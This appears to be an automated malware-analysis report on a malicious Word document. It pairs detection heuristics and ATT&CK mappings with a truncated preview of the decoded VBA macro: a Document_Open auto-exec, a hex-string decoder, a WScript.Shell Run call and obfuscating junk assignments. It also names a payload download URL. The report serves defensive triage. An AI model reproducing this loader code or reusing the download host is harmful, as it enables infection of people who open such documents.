MALICIOUS
Risk Score: 304

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The sample contains a heavily obfuscated VBA macro with an auto-execute function (Document_Open). This macro uses CreateObject to instantiate a WScript.Shell object and then executes a PowerShell command. The PowerShell command is constructed to download a file from 'http://examon.info/franky/INV-00007' using a .NET WebClient. This indicates the document is a downloader for a second-stage payload.
Heuristics (9)

- ClamAV: Doc.Malware.Valyria-6748978-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6748978-0
- VBA macros detected (medium, 5 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- cmd.exe reference in VBA (high, OLE_VBA_CMD): cmd.exe reference in VBA
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46549 bytes |

SHA-256: a5578dc75e9c6d8d042bf141d06d550b11c8feec46a27ac7efb77960a46727a6

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s))
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const P21sw4avsuMlOEOZFVe As String = "0x"
Const P22sw4avsuMlOEOZFVe As String = "&h"
Public Function P23sw4avsuMlOEOZFVe(ByVal sw4avsuMlOEOZFVe As String, Optional ByVal JlNQNaDDEHC6QgLa As String = P21sw4avsuMlOEOZFVe) As Variant
P23sw4avsuMlOEOZFVe = CVErr(xlErrValue)
For i = 0 To 17: IIf 4 = 5, a = 5, False: Next i
If Left$(sw4avsuMlOEOZFVe, Len(JlNQNaDDEHC6QgLa)) = JlNQNaDDEHC6QgLa Then
Dim IK6KBRxtLJ87bQiq As String
IK6KBRxtLJ87bQiq = Right$(sw4avsuMlOEOZFVe, Len(sw4avsuMlOEOZFVe) - Len(JlNQNaDDEHC6QgLa))
If Len(IK6KBRxtLJ87bQiq) Mod 2 = 0 Then
Dim Bq9OHXgw2BHYZx5f As Integer
For i = 0 To 17: IIf 4 = 5, a = 5, False: Next i
Bq9OHXgw2BHYZx5f = Len(IK6KBRxtLJ87bQiq) / 2
Dim dE7qJmN8XvfebGBW As String
Dim umABg9E1EKQ9kIDo As Integer
For umABg9E1EKQ9kIDo = 1 To Bq9OHXgw2BHYZx5f
dE7qJmN8XvfebGBW = dE7qJmN8XvfebGBW & Chr(Val(P22sw4avsuMlOEOZFVe & Mid$(IK6KBRxtLJ87bQiq, (umABg9E1EKQ9kIDo * 2) - 1, 2)))
Next umABg9E1EKQ9kIDo
P23sw4avsuMlOEOZFVe = dE7qJmN8XvfebGBW
End If
End If
P23sw4avsuMlOEOZFVe = Replace(P23sw4avsuMlOEOZFVe, "cmd /c ", "")
End Function
Private Sub G33IT2QvOaXlRbux()
On Error GoTo aUBN6F8e9fV8FNYp
CreateObject(P23sw4avsuMlOEOZFVe("0x575363726970742E5368656C6C")).Run P23sw4avsuMlOEOZFVe("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
cleanExit:
Exit Sub
aUBN6F8e9fV8FNYp:
If Err = 3004 Then
Resume Next
Else
Resume cleanExit
End If
End Sub
Private Sub Document_Open()
G33IT2QvOaXlRbux
End Sub
Private Sub LdgAJrENkJrgZZ8e()
vgf2V5ldcYn1g9Fn = "e8HrQOhy2aiVDWKG"
ex0YjdsW2cyUdMIk = "cda0tRxX8QaUXzLq"
mRVTiQecPTyNnwvp = "y7SAVSmy9dZDdI8D"
whGw0Xcx88kJtSKM = "sUr0QlFFFxTf0L9i"
M4ng08yO4vBXJNfq = "ynhsqiWqMa1Ee7Gx"
YcXyGEWxwM5vUR61 = "oEOMEQ1Mh6DZg4L7"
PdXGZQT9BT6NnCG5 = "damKv23tllqKa7qC"
b7GR3BbLTMmUTnzP = "wIUgRaM5kFvNAk8E"
yFMp6YcM8O0SQiJ7 = "NLiDmkTavKHyfykK"
HSspLkTMGhigk3pb = "Vx1ZcGstVO3wrNIK"
xqe70uxO0F7ecMZC = "rGCSHuHiB9D8rxw2"
EIO3YrlOap8HJoqj = "NCbUlZdhT6H10yvE"
hfEF76Mdv0Rrw9Kn = "LunYwLQUEIk2UtVM"
UFzDTVlZZ8AuhVVT = "tuiGlGhIySaAVUsb"
efx0LgD6jx9xlxNS = "NBFAlpByx0fbVUde"
Jzpcy4ir1mxXHUwb = "esNvp200N9DTaBly"
q4RVhLu1soI81N0M = "ze6EhSZWJzzyByqB"
b8FOcL3E7Vdau189 = "h0p6EQrLf4nSm5A3"
Xh73joK3kDGvPYDQ = "wzpLjt6uQ4Hixlrc"
skcn4e04qwVbl65q = "xGsXPZUOkMnoRCG9"
jD8GWpWwIvvWI5iT = "YrQ12EwHzxcr1OnY"
QVZR7zDmT6pvE7hp = "zDpAUOhQhCgzmFE5"
gG7VfAWKXEh6pacC = "nWXzwWdkOjLFte9p"
xtn7avkdQPOqIkCg = "wOizQfJvCWg6ZrqT"
z1E5XeB5MTSQkXMF = "JFfO5LIxT1Gopooz"
v1VPPHswnnW7w2lO = "hOpumLY4ugl6JnQz"
Atqtc7YkmSBRXKb1 = "J0eM83nYd1wJvvXa"
CCKMvynkbfuYjMDB = "KyEQUORtGDgjpeck"
gwV5hZQ4ylRDx9QT = "DwLKdgt6Trh2rd56"
cjQW1Iu2RKsK3p5G = "NwL3DDhadYlZRXNv"
nVAos32abR1EYScF = "sLg4CbDLcPTdxEk4"
V7uiYRo2EK1ULNmu = "NPEhRS2osZmMkYNH"
C7I1z4QNxnA1kS9y = "yzrRadmneg09GLSP"
WunNgv529ZUEtbdK = "QXiUI5HEUvWtdRiV"
zU50FwsiEySltS3d = "briSC7haXT2VIOYr"
K89IgnfEFaqjnvlc = "wTrVJAtHN4cUDHL2"
DBFuSv7YmOnCR7XD = "C0uYvcSrPD4llub8"
End Sub
Private Sub vyKWZ1tfWCK4m0ZP()
fKmOmWHHRnNqBVN2 = "GpdtyaMQHpb3DYeZ"
HoeLhAVM1cfMndNa = "PRr7XGsg6Ff6UNe2"
hYMmQcUnDBCv5aEE = "FafVHhbh68NMuZ1n"
XmDyACuV7eFxd7l6 = "bLvTJtvcWFqSyi2N"
DpwSHfdjQtXDOOe8 = "ORLTEhOP0BL5lOxY"
k1XYLCA5ImdpF2Ai = "wr5QHjjBKQ1fEi7f"
V9rU1qyvrOmsezl8 = "bDE4PQsdR
```

... (truncated)